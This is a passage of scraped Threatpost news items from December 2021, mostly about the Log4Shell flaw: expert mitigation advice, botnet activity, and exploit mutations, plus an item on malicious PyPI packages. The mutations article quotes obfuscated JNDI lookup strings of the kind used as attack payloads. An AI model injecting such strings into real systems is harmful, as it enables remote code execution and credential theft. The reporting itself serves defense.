applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:15", "description": "Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical [remote code-execution (RCE) flaw ](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.\n\nNow under active exploit, the \u201cLog4Shell\u201d bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.\n\nFirst, analysts at NetLab 360 detected two waves of [Log4Shell attacks](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) on their honeypots, from the Muhstik and Mirai botnets.\n\n## **Mirai Tweaked to Troll for Log4Shell Vulnerability **\n\nThe analysts at Netlab 360 said this is a new variant of Mirai with a few specific innovations. First, they pointed out the code piece \u201ctable_init/table_lock_val/table_unlock_val and other Mirai-specific configuration management functions have been removed.\u201d\n\nSecondly, they added, \u201cThe attack_init function is also discarded, and the DDoS attack function is called directly by the command-processing function.\u201d\n\nFinally, they found this iteration of the Mirai botnet uses a two-level domain for its command-and-control (C2) mechanis,, which the team at Netlab 360 said was \u201crare.\u201d\n\n## **Muhstik Variant Attacks Log4Shell **\n\nThe other Linux botnet launched to take advantage of the Apache 4j Library flaw is [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>), a Mirai variant.\n\n\u201cIn this captured sample, we note that the new Muhstik variant adds a backdoor module, ldm, which has the ability to add an SSH backdoor public key with the following installed backdoor public key,\u201d Netlab 360 reported.\n\nOnce added, the public key lets a threat actor log onto the server without so much as a password, they explained.\n\n\u201cMuhstik takes a blunt approach to spread the payload aimlessly, knowing that there will be vulnerable machines, and in order to know who has been infected, Muhstik adopts TOR network for its reporting mechanism,\u201d the Netlab 360 team said.\n\nFollowing detection of those attacks, the Netlab 360 team [found](<https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/>) other botnets on the hunt for the Log4Shell vulnerability including: DDoS family Elknot; mining family m8220; SitesLoader; xmrig.pe; xmring.ELF; attack tool 1; attack tool 2; plus one unknown and a PE family.\n\n## **Geography of Log4Shell Attacks **\n\nThe majority of [exploitation attempts against Log4Shell](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>) originate in Russia, according to Kaspersky researchers who found 4,275 attacks launched from Russia, by far the most of any other region. By comparison, 351 attempts were launched from China and 1,746 from the U.S.\n\nSo far, the [Apache Log4j logging library exploit](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) has spun off 60 mutations \u2014 and it only took less than a day.\n\nThis story is developing, so stay tuned to Threatpost for [additional coverage](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>).\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ _REGISTER TODAY_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ _LIVE, interactive Threatpost Town Hall_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ for the LIVE event!_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T19:00:01", "type": "threatpost", "title": "Where the Latest Log4Shell Attacks Are Coming From", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T19:00:01", "id": "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "href": "https://threatpost.com/log4shell-attacks-origin-botnet/176977/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:26", "description": "Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications.\n\nIndependent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.\n\nUnfortunately, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nIn this case, Scott found a malicious package containing a known trojan malware and two info-stealers.\n\nThe trojanized package is called \u201caws-login0tool,\u201d and once the package is installed, it fetches a payload executable that turns out to be a [known trojan](<https://www.virustotal.com/gui/file/79d9ecfcc143ae3216904c882a3984a90901536e6fccd223eb9bf78d943df1cd>), he said.\n\n\u201cI found this package because it was flagged in multiple text searches I did looking at setup.py, since that\u2019s one of the most common locations for malicious code in Python packages since arbitrary code can be executed there at install time,\u201d Scott explained in a [Sunday posting](<https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2>). \u201cSpecifically I found this by looking for import urllib.request since this is commonly used to exfiltrate data or download malicious files and it was also triggered by `from subprocess import Popen` which is somewhat suspicious because most packages don\u2019t need to execute arbitrary command line code.\u201d\n\nScott also identified two other malicious packages by looking at the import urllib.request string, both of which are built for data exfiltration.\n\nNamed \u201cdpp-client\u201d and \u201cdpp-client1234I,\u201d the two were uploaded by the same user in February. During installation, they collect details on the environment and file listings, and appear to \u201cbe looking specifically for files related to Apache Mesos,\u201d Scott said, which is an open-source project to manage computer clusters. Once the information is gathered, it\u2019s sent off to an unknown web service, according to the researcher.\n\nThe Python security team removed the identified packages once notified on Dec. 10, but all three packages live on thanks to the projects that imported them prior to the removal.\n\nScott said that the trojan package was first added to PyPI on Dec. 1. It was subsequently downloaded nearly 600 times. As for the data stealers, the dpp-client package has been downloaded more than 10,000 times, including 600+ downloads in the last month; dpp-client1234 has been downloaded around 1,500 times. and both packages mimicked an existing popular library with their source code URL, \u201cso anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks \u2013 indicating a good reputation.\u201d\n\nThe software-supply chain has become an increasingly popular method of distributing malware. Last week, for instance, a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) The packages can be used to take over unsuspecting users\u2019 accounts and servers.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:46:34", "type": "threatpost", "title": "Malicious PyPI Code Packages Rack Up Thousands of Downloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:46:34", "id": "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "href": "https://threatpost.com/malicious-pypi-code-packages/176971/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. \u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * ** **[**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201c\u201dWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list 